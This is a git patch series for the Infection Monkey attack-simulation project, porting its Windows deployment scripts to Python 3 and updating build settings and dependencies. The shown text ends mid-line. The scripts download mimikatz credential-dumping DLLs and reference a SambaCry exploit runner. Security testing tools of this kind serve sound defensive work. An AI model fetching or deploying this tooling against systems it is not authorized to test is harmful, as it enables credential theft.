From 9a21a50fd16a207fa278dedd0c1f1e0122aa1810 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 26 Sep 2019 10:53:25 +0300 Subject: [PATCH 01/44] Windows deployment scripts to python3 --- deployment_scripts/config.ps1 | 5 +---- deployment_scripts/deploy_windows.ps1 | 13 ++++--------- 2 files changed, 5 insertions(+), 13 deletions(-) diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1 index 07be64612..4fee48e09 100644 --- a/deployment_scripts/config.ps1 +++ b/deployment_scripts/config.ps1 @@ -3,7 +3,7 @@ $MONKEY_FOLDER_NAME = "infection_monkey" # Url of public git repository that contains monkey's source code $MONKEY_GIT_URL = "https://github.com/guardicore/monkey" # Link to the latest python download or install it manually -$PYTHON_URL = "https://www.python.org/ftp/python/2.7.13/python-2.7.13.amd64.msi" +$PYTHON_URL = "https://www.python.org/ftp/python/3.7.4/python-3.7.4-amd64.exe" # Monkey binaries $LINUX_32_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-32" @@ -33,14 +33,11 @@ $TEMP_CPP_INSTALLER = "cpp.exe" $TEMP_NPM_INSTALLER = "node.msi" $TEMP_PYWIN32_INSTALLER = "pywin32.exe" $TEMP_UPX_ZIP = "upx.zip" -$TEMP_VC_FOR_PYTHON27_INSTALLER = "vcforpython.msi" $UPX_FOLDER = "upx394w" # Other url's -$VC_FOR_PYTHON27_URL = "https://download.microsoft.com/download/7/9/6/796EF2E4-801B-4FC4-AB28-B59FBF6D907B/VCForPython27.msi" $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip" $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip" -$CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572" $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi" $PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b224/pywin32-224.win-amd64-py2.7.exe" $UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip" diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 17d08ecc8..1bfb62445 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -44,15 +44,15 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, try { $version = cmd.exe /c '"python" --version 2>&1' - if ( $version -like 'Python 2.7.*' ) { - "Python 2.7.* was found, installing dependancies" + if ( $version -like 'Python 3.*' ) { + "Python 3.* was found, installing dependencies" } else { throw System.Management.Automation.CommandNotFoundException } } catch [System.Management.Automation.CommandNotFoundException] { - "Downloading python 2.7 ..." + "Downloading python 3 ..." $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER) Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") @@ -69,7 +69,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, $PYTHON_PATH = Split-Path -Path (Get-Command python | Select-Object -ExpandProperty Source) # Get vcforpython27 before installing requirements - "Downloading Visual C++ Compiler for Python 2.7 ..." + "Downloading Visual C++ Compiler for Python 3 ..." $webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER) Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") @@ -115,11 +115,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Removing zip file" Remove-Item $TEMP_OPEN_SSL_ZIP - # Download and install C++ redistributable - "Downloading C++ redistributable ..." - $webClient.DownloadFile($CPP_URL, $TEMP_CPP_INSTALLER) - Start-Process -Wait $TEMP_CPP_INSTALLER -ErrorAction Stop - Remove-Item $TEMP_CPP_INSTALLER # Generate ssl certificate "Generating ssl certificate" From 2af17bc37193e6d1dad4addf0146265e67566199 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 2 Oct 2019 10:15:53 +0300 Subject: [PATCH 02/44] Windows deployment scripts to python3 --- deployment_scripts/config.ps1 | 18 +++++------- deployment_scripts/deploy_windows.ps1 | 35 +++++------------------ monkey/infection_monkey/build_windows.bat | 2 +- monkey/infection_monkey/monkey.spec | 12 +------- monkey/monkey_island/requirements.txt | 4 +-- 5 files changed, 18 insertions(+), 53 deletions(-) diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1 index 4fee48e09..a3dafc66e 100644 --- a/deployment_scripts/config.ps1 +++ b/deployment_scripts/config.ps1 @@ -22,24 +22,20 @@ $SAMBA_64_BINARY_NAME = "sc_monkey_runner64.so" # Other directories and paths ( most likely you dont need to configure) $MONKEY_ISLAND_DIR = "\monkey\monkey_island" $MONKEY_DIR = "\monkey\infection_monkey" -$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\exploit\sambacry_monkey_runner" +$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\bin" $PYTHON_DLL = "C:\Windows\System32\python27.dll" -$MK32_DLL = "mk32.dll" -$MK64_DLL = "mk64.dll" -$TEMP_PYTHON_INSTALLER = ".\python.msi" +$MK32_DLL = "mk32.zip" +$MK64_DLL = "mk64.zip" +$TEMP_PYTHON_INSTALLER = ".\python.exe" $TEMP_MONGODB_ZIP = ".\mongodb.zip" $TEMP_OPEN_SSL_ZIP = ".\openssl.zip" -$TEMP_CPP_INSTALLER = "cpp.exe" $TEMP_NPM_INSTALLER = "node.msi" $TEMP_PYWIN32_INSTALLER = "pywin32.exe" -$TEMP_UPX_ZIP = "upx.zip" -$UPX_FOLDER = "upx394w" # Other url's $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip" $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip" $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi" -$PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b224/pywin32-224.win-amd64-py2.7.exe" -$UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip" -$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.dll" -$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.dll" +$PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b225/pywin32-225.win-amd64-py3.7.exe" +$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.zip" +$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.zip" diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 1bfb62445..c7192a4c8 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -53,6 +53,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, catch [System.Management.Automation.CommandNotFoundException] { "Downloading python 3 ..." + "Select 'add to PATH' when installing" $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER) Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") @@ -60,23 +61,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, # Check if installed correctly $version = cmd.exe /c '"python" --version 2>&1' if ( $version -like '* is not recognized*' ) { - "Python is not found in PATH. Add it manually or reinstall python." + "Python is not found in PATH. If you just installed python you need to restart cmd. + Else, add it manually or reinstall python." return } } - # Set python home dir - $PYTHON_PATH = Split-Path -Path (Get-Command python | Select-Object -ExpandProperty Source) - - # Get vcforpython27 before installing requirements - "Downloading Visual C++ Compiler for Python 3 ..." - $webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER) - Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop - $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") - Remove-Item $TEMP_VC_FOR_PYTHON27_INSTALLER - - # Install requirements for island - $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop "Upgrading pip..." $output = cmd.exe /c 'python -m pip install --user --upgrade pip 2>&1' $output @@ -84,8 +74,11 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Make sure pip module is installed and re-run this script." return } + + "Installing python packages for island" + $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop & python -m pip install --user -r $islandRequirements - # Install requirements for monkey + "Installing python packages for monkey" $monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements_windows.txt" & python -m pip install --user -r $monkeyRequirements @@ -115,7 +108,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Removing zip file" Remove-Item $TEMP_OPEN_SSL_ZIP - # Generate ssl certificate "Generating ssl certificate" Push-Location -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR) @@ -167,19 +159,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, $binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\bin") New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue - # Download upx - if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "upx.exe") )){ - "Downloading upx ..." - $webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP) - "Unzipping upx" - Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction SilentlyContinue - Move-Item -Path (Join-Path -Path $binDir -ChildPath $UPX_FOLDER | Join-Path -ChildPath "upx.exe") -Destination $binDir - # Remove unnecessary files - Remove-Item -Recurse -Force (Join-Path -Path $binDir -ChildPath $UPX_FOLDER) - "Removing zip file" - Remove-Item $TEMP_UPX_ZIP - } - # Download mimikatz binaries $mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL if(!(Test-Path -Path $mk32_path )){ diff --git a/monkey/infection_monkey/build_windows.bat b/monkey/infection_monkey/build_windows.bat index e5ff5a805..e2bf2935e 100644 --- a/monkey/infection_monkey/build_windows.bat +++ b/monkey/infection_monkey/build_windows.bat @@ -1 +1 @@ -pyinstaller -F --log-level=DEBUG --clean --upx-dir=.\bin monkey.spec \ No newline at end of file +pyinstaller -F --log-level=DEBUG --clean --noupx monkey.spec diff --git a/monkey/infection_monkey/monkey.spec b/monkey/infection_monkey/monkey.spec index d29adddb1..e35fd2630 100644 --- a/monkey/infection_monkey/monkey.spec +++ b/monkey/infection_monkey/monkey.spec @@ -67,17 +67,11 @@ def process_datas(orig_datas): def get_binaries(): - binaries = get_windows_only_binaries() if is_windows() else get_linux_only_binaries() + binaries = [] if is_windows() else get_linux_only_binaries() binaries += get_sc_binaries() return binaries -def get_windows_only_binaries(): - binaries = [] - binaries += get_msvcr() - return binaries - - def get_linux_only_binaries(): binaries = [] binaries += get_traceroute_binaries() @@ -92,10 +86,6 @@ def get_sc_binaries(): return [(x, get_bin_file_path(x), 'BINARY') for x in ['sc_monkey_runner32.so', 'sc_monkey_runner64.so']] -def get_msvcr(): - return [('msvcr100.dll', os.environ['WINDIR'] + '\\system32\\msvcr100.dll', 'BINARY')] - - def get_traceroute_binaries(): traceroute_name = 'traceroute32' if is_32_bit() else 'traceroute64' return [(traceroute_name, get_bin_file_path(traceroute_name), 'BINARY')] diff --git a/monkey/monkey_island/requirements.txt b/monkey/monkey_island/requirements.txt index e6d81e6aa..57ca79348 100644 --- a/monkey/monkey_island/requirements.txt +++ b/monkey/monkey_island/requirements.txt @@ -1,6 +1,6 @@ bson python-dateutil -tornado==5.1.1 +tornado werkzeug jinja2 markupsafe @@ -10,7 +10,7 @@ flask Flask-Pymongo Flask-Restful Flask-JWT -jsonschema==2.6.0 +jsonschema netifaces ipaddress enum34 From fabcd4c9df0ac77e3ac45821ba81a7bab3164741 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 3 Oct 2019 12:40:58 +0300 Subject: [PATCH 03/44] Removed enum34 from requirements --- .../infection_monkey/requirements_windows.txt | 2 - monkey/monkey_island/cc/ui/package-lock.json | 101 +++++++++--------- monkey/monkey_island/cc/ui/package.json | 14 +-- monkey/monkey_island/requirements.txt | 1 - 4 files changed, 57 insertions(+), 61 deletions(-) diff --git a/monkey/infection_monkey/requirements_windows.txt b/monkey/infection_monkey/requirements_windows.txt index ce5021923..cb3f43660 100644 --- a/monkey/infection_monkey/requirements_windows.txt +++ b/monkey/infection_monkey/requirements_windows.txt @@ -1,4 +1,3 @@ -enum34 impacket pycryptodome cffi @@ -15,4 +14,3 @@ wmi pywin32 pymssql pyftpdlib -enum34 diff --git a/monkey/monkey_island/cc/ui/package-lock.json b/monkey/monkey_island/cc/ui/package-lock.json index 14e547416..b402cad83 100644 --- a/monkey/monkey_island/cc/ui/package-lock.json +++ b/monkey/monkey_island/cc/ui/package-lock.json @@ -2731,7 +2731,7 @@ "dev": true, "requires": { "bluebird": "3.5.5", - "chownr": "1.1.2", + "chownr": "1.1.3", "figgy-pudding": "3.5.1", "glob": "7.1.4", "graceful-fs": "4.2.2", @@ -2759,7 +2759,7 @@ "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", "dev": true, "requires": { - "yallist": "3.0.3" + "yallist": "3.1.1" } }, "y18n": { @@ -2769,9 +2769,9 @@ "dev": true }, "yallist": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.0.3.tgz", - "integrity": "sha512-S+Zk8DEWE6oKpV+vI3qWkaK+jSbIK86pCwe2IF/xwIpQ8jEuxpw9NyaGjmp9+BoJv5FV2piqCDcoCtStppiq2A==", + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", + "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", "dev": true } } @@ -2945,9 +2945,9 @@ } }, "chownr": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.2.tgz", - "integrity": "sha512-GkfeAQh+QNy3wquu9oIZr6SS5x7wGdSgNQvD10X3r+AZr1Oys22HW8kAmDMvNg2+Dm0TeGaEuO8gFwdBXxwO8A==", + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.3.tgz", + "integrity": "sha512-i70fVHhmV3DtTl6nqvZOnIjbY0Pe4kAUjwHj8z0zAdgBtYrJyYwLKCCuRBQ5ppkyL0AkN7HKRnETdmdp1zqNXw==", "dev": true }, "chrome-trace-event": { @@ -5117,9 +5117,9 @@ } }, "eslint-plugin-react": { - "version": "7.14.3", - "resolved": "https://registry.npmjs.org/eslint-plugin-react/-/eslint-plugin-react-7.14.3.tgz", - "integrity": "sha512-EzdyyBWC4Uz2hPYBiEJrKCUi2Fn+BJ9B/pJQcjw5X+x/H2Nm59S4MJIvL4O5NEE0+WbnQwEBxWY03oUk+Bc3FA==", + "version": "7.15.1", + "resolved": "https://registry.npmjs.org/eslint-plugin-react/-/eslint-plugin-react-7.15.1.tgz", + "integrity": "sha512-YotSItgMPwLGlr3df44MGVyXnHkmKcpkHTzpte3QwJtocr3nFqCXCuoxFZeBtnT8RHdj038NlTvam3dcAFrMcA==", "dev": true, "requires": { "array-includes": "3.0.3", @@ -5652,9 +5652,9 @@ "optional": true }, "filepond": { - "version": "4.7.1", - "resolved": "https://registry.npmjs.org/filepond/-/filepond-4.7.1.tgz", - "integrity": "sha512-AxZBhsGS9QEJfbLiASUJMuS3hLhq/HbkKaJx1gKYCQ0lbs/OfciKKdeFbtAVKk0o9o6DcITw2C+QqFcTP1QBCg==" + "version": "4.7.2", + "resolved": "https://registry.npmjs.org/filepond/-/filepond-4.7.2.tgz", + "integrity": "sha512-OqG35MnmvrGnq2KgHO0PS8uujzRqQL/bMlSy0StqRn6RRAM6wBM9gzQl22IvWLwMyw6g8aIZTZAhMaiTS1LZsA==" }, "fill-range": { "version": "2.2.3", @@ -6362,7 +6362,7 @@ "bundled": true, "dev": true, "requires": { - "inherits": "~2.0.0" + "inherits": "2.0.3" } }, "boom": { @@ -6485,7 +6485,7 @@ "dev": true, "optional": true, "requires": { - "jsbn": "~0.1.0" + "jsbn": "0.1.1" } }, "extend": { @@ -6695,14 +6695,13 @@ "dev": true, "optional": true, "requires": { - "jsbn": "~0.1.0" + "jsbn": "0.1.1" } }, "jsbn": { "version": "0.1.1", "bundled": true, - "dev": true, - "optional": true + "dev": true }, "json-schema": { "version": "0.2.3", @@ -6716,7 +6715,7 @@ "dev": true, "optional": true, "requires": { - "jsonify": "~0.0.0" + "jsonify": "0.0.0" } }, "json-stringify-safe": { @@ -15577,9 +15576,9 @@ } }, "react": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react/-/react-16.9.0.tgz", - "integrity": "sha512-+7LQnFBwkiw+BobzOF6N//BdoNw0ouwmSJTEm9cglOOmsg/TMiFHZLe2sEoN5M7LgJTj9oHH0gxklfnQe66S1w==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react/-/react-16.10.1.tgz", + "integrity": "sha512-2bisHwMhxQ3XQz4LiJJwG3360pY965pTl/MRrZYxIBKVj4fOHoDs5aZAkYXGxDRO1Li+SyjTAilQEbOmtQJHzA==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1", @@ -15667,14 +15666,14 @@ } }, "react-dom": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.9.0.tgz", - "integrity": "sha512-YFT2rxO9hM70ewk9jq0y6sQk8cL02xm4+IzYBz75CQGlClQQ1Bxq0nhHF6OtSbit+AIahujJgb/CPRibFkMNJQ==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.10.1.tgz", + "integrity": "sha512-SmM4ZW0uug0rn95U8uqr52I7UdNf6wdGLeXDmNLfg3y5q5H9eAbdjF5ubQc3bjDyRrvdAB2IKG7X0GzSpnn5Mg==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1", "prop-types": "15.7.2", - "scheduler": "0.15.0" + "scheduler": "0.16.1" } }, "react-event-timeline": { @@ -15719,9 +15718,9 @@ } }, "react-hot-loader": { - "version": "4.12.13", - "resolved": "https://registry.npmjs.org/react-hot-loader/-/react-hot-loader-4.12.13.tgz", - "integrity": "sha512-4Byk3aVQhcmTnVCBvDHOEOUnMFMj81r2yRKZQSfLOG2yd/4hm/A3oK15AnCZilQExqSFSsHcK64lIIU+dU2zQQ==", + "version": "4.12.14", + "resolved": "https://registry.npmjs.org/react-hot-loader/-/react-hot-loader-4.12.14.tgz", + "integrity": "sha512-ecxH4eBvEaJ9onT8vkEmK1FAAJUh1PqzGqds9S3k+GeihSp7nKAp4fOxytO+Ghr491LiBD38jaKyDXYnnpI9pQ==", "dev": true, "requires": { "fast-levenshtein": "2.0.6", @@ -15746,7 +15745,7 @@ "integrity": "sha512-0XsbTXxgiaCDYDIWFcwkmerZPSwywfUqYmwT4jzewKTQSWoE6FCMoUVOeBJWK3E/CrWbxRG3m5GzY4lnIwGRBA==", "dev": true, "requires": { - "react-is": "16.9.0" + "react-is": "16.10.1" } }, "json5": { @@ -15770,9 +15769,9 @@ } }, "react-is": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.9.0.tgz", - "integrity": "sha512-tJBzzzIgnnRfEm046qRcURvwQnZVXmuCbscxUO5RWrGTXpon2d4c8mI0D8WE6ydVIm29JiLB6+RslkIvym9Rjw==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.10.1.tgz", + "integrity": "sha512-BXUMf9sIOPXXZWqr7+c5SeOKJykyVr2u0UDzEf4LNGc6taGkQe1A9DFD07umCIXz45RLr9oAAwZbAJ0Pkknfaw==", "dev": true }, "source-map": { @@ -16008,9 +16007,9 @@ } }, "react-toggle": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/react-toggle/-/react-toggle-4.0.2.tgz", - "integrity": "sha512-EPTWnN7gQHgEAUEmjheanZXNzY5TPnQeyyHfEs3YshaiWZf5WNjfYDrglO5F1Hl/dNveX18i4l0grTEsYH2Ccw==", + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/react-toggle/-/react-toggle-4.1.1.tgz", + "integrity": "sha512-+wXlMcSpg8SmnIXauMaZiKpR+r2wp2gMUteroejp2UTSqGTVvZLN+m9EhMzFARBKEw7KpQOwzCyfzeHeAndQGw==", "requires": { "classnames": "2.2.6" } @@ -16706,9 +16705,9 @@ } }, "scheduler": { - "version": "0.15.0", - "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.15.0.tgz", - "integrity": "sha512-xAefmSfN6jqAa7Kuq7LIJY0bwAPG3xlCj0HMEBQk1lxYiDKZscY2xJ5U/61ZTrYbmNQbXa+gc7czPkVo11tnCg==", + "version": "0.16.1", + "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.16.1.tgz", + "integrity": "sha512-MIuie7SgsqMYOdCXVFZa8SKoNorJZUWHW8dPgto7uEHn1lX3fg2Gu0TzgK8USj76uxV7vB5eRMnZs/cdEHg+cg==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1" @@ -17936,20 +17935,20 @@ } }, "terser": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/terser/-/terser-4.3.1.tgz", - "integrity": "sha512-pnzH6dnFEsR2aa2SJaKb1uSCl3QmIsJ8dEkj0Fky+2AwMMcC9doMqLOQIH6wVTEKaVfKVvLSk5qxPBEZT9mywg==", + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/terser/-/terser-4.3.4.tgz", + "integrity": "sha512-Kcrn3RiW8NtHBP0ssOAzwa2MsIRQ8lJWiBG/K7JgqPlomA3mtb2DEmp4/hrUA+Jujx+WZ02zqd7GYD+QRBB/2Q==", "dev": true, "requires": { - "commander": "2.20.0", + "commander": "2.20.1", "source-map": "0.6.1", "source-map-support": "0.5.13" }, "dependencies": { "commander": { - "version": "2.20.0", - "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.0.tgz", - "integrity": "sha512-7j2y+40w61zy6YC2iRNpUe/NwhNyoXrYpHMrSunaMG64nRnaf96zO/KMQR4OyN/UnE5KLyEBnKHd4aG3rskjpQ==", + "version": "2.20.1", + "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.1.tgz", + "integrity": "sha512-cCuLsMhJeWQ/ZpsFTbE765kvVfoeSddc4nU3up4fV+fDBcfUXnbITJ+JzhkdjzOqhURjZgujxaioam4RM9yGUg==", "dev": true }, "source-map": { @@ -17982,7 +17981,7 @@ "schema-utils": "1.0.0", "serialize-javascript": "1.9.1", "source-map": "0.6.1", - "terser": "4.3.1", + "terser": "4.3.4", "webpack-sources": "1.4.3", "worker-farm": "1.7.0" }, @@ -19710,9 +19709,9 @@ } }, "webpack": { - "version": "4.40.2", - "resolved": "https://registry.npmjs.org/webpack/-/webpack-4.40.2.tgz", - "integrity": "sha512-5nIvteTDCUws2DVvP9Qe+JPla7kWPPIDFZv55To7IycHWZ+Z5qBdaBYPyuXWdhggTufZkQwfIK+5rKQTVovm2A==", + "version": "4.41.0", + "resolved": "https://registry.npmjs.org/webpack/-/webpack-4.41.0.tgz", + "integrity": "sha512-yNV98U4r7wX1VJAj5kyMsu36T8RPPQntcb5fJLOsMz/pt/WrKC0Vp1bAlqPLkA1LegSwQwf6P+kAbyhRKVQ72g==", "dev": true, "requires": { "@webassemblyjs/ast": "1.8.5", diff --git a/monkey/monkey_island/cc/ui/package.json b/monkey/monkey_island/cc/ui/package.json index aa85164ce..6743638d5 100644 --- a/monkey/monkey_island/cc/ui/package.json +++ b/monkey/monkey_island/cc/ui/package.json @@ -37,7 +37,7 @@ "css-loader": "^1.0.1", "eslint": "^5.16.0", "eslint-loader": "^2.2.1", - "eslint-plugin-react": "^7.14.3", + "eslint-plugin-react": "^7.15.1", "file-loader": "^1.1.11", "glob": "^7.1.4", "html-loader": "^0.5.5", @@ -56,11 +56,11 @@ "phantomjs-prebuilt": "^2.1.16", "react-addons-test-utils": "^15.6.2", "react-event-timeline": "^1.6.3", - "react-hot-loader": "^4.12.13", + "react-hot-loader": "^4.12.14", "rimraf": "^2.7.1", "style-loader": "^0.22.1", "url-loader": "^1.1.2", - "webpack": "^4.40.2", + "webpack": "^4.41.0", "webpack-cli": "^3.3.9", "webpack-dev-server": "^3.8.1" }, @@ -74,7 +74,7 @@ "downloadjs": "^1.4.7", "fetch": "^1.1.0", "file-saver": "^2.0.2", - "filepond": "^4.7.1", + "filepond": "^4.7.2", "js-file-download": "^0.4.8", "json-loader": "^0.5.7", "jwt-decode": "^2.2.0", @@ -85,13 +85,13 @@ "pluralize": "^7.0.0", "prop-types": "^15.7.2", "rc-progress": "^2.5.2", - "react": "^16.9.0", + "react": "^16.10.1", "react-bootstrap": "^0.32.4", "react-copy-to-clipboard": "^5.0.1", "react-data-components": "^1.2.0", "react-desktop-notification": "^1.0.9", "react-dimensions": "^1.3.0", - "react-dom": "^16.9.0", + "react-dom": "^16.10.1", "react-fa": "^5.0.0", "react-filepond": "^7.0.1", "react-graph-vis": "^1.0.2", @@ -101,7 +101,7 @@ "react-router-dom": "^4.3.1", "react-spinners": "^0.5.13", "react-table": "^6.10.3", - "react-toggle": "^4.0.1", + "react-toggle": "^4.1.1", "react-tooltip-lite": "^1.10.0", "redux": "^4.0.4", "sass-loader": "^7.3.1", diff --git a/monkey/monkey_island/requirements.txt b/monkey/monkey_island/requirements.txt index 57ca79348..a2e734324 100644 --- a/monkey/monkey_island/requirements.txt +++ b/monkey/monkey_island/requirements.txt @@ -13,7 +13,6 @@ Flask-JWT jsonschema netifaces ipaddress -enum34 pycryptodome boto3 botocore From 04d8f1341bd07e93e50d11b93454ff2c0649f887 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 3 Oct 2019 17:20:14 +0300 Subject: [PATCH 04/44] Fixed bug that caused PATH not to be refreshed after python installation --- deployment_scripts/deploy_windows.ps1 | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index c7192a4c8..87d6bc8cf 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -56,13 +56,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Select 'add to PATH' when installing" $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER) Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop - $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") + $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User") Remove-Item $TEMP_PYTHON_INSTALLER # Check if installed correctly $version = cmd.exe /c '"python" --version 2>&1' if ( $version -like '* is not recognized*' ) { - "Python is not found in PATH. If you just installed python you need to restart cmd. - Else, add it manually or reinstall python." + "Python is not found in PATH. Add it to PATH and relaunch the script." return } } From 58ecb83977c1e87e04e4dad97a6187f5b41bf2db Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Mon, 7 Oct 2019 09:53:18 +0300 Subject: [PATCH 05/44] Added C++ redistributable required for windows and brought back UPX --- deployment_scripts/config.ps1 | 5 +++++ deployment_scripts/deploy_windows.ps1 | 19 +++++++++++++++++++ monkey/infection_monkey/build_windows.bat | 2 +- monkey/infection_monkey/monkey.spec | 1 + 4 files changed, 26 insertions(+), 1 deletion(-) diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1 index a3dafc66e..095f7b899 100644 --- a/deployment_scripts/config.ps1 +++ b/deployment_scripts/config.ps1 @@ -29,13 +29,18 @@ $MK64_DLL = "mk64.zip" $TEMP_PYTHON_INSTALLER = ".\python.exe" $TEMP_MONGODB_ZIP = ".\mongodb.zip" $TEMP_OPEN_SSL_ZIP = ".\openssl.zip" +$TEMP_CPP_INSTALLER = "cpp.exe" $TEMP_NPM_INSTALLER = "node.msi" $TEMP_PYWIN32_INSTALLER = "pywin32.exe" +$TEMP_UPX_ZIP = "upx.zip" +$UPX_FOLDER = "upx394w" # Other url's $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip" $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip" +$CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572" $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi" $PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b225/pywin32-225.win-amd64-py3.7.exe" $MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.zip" $MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.zip" +$UPX_URL = 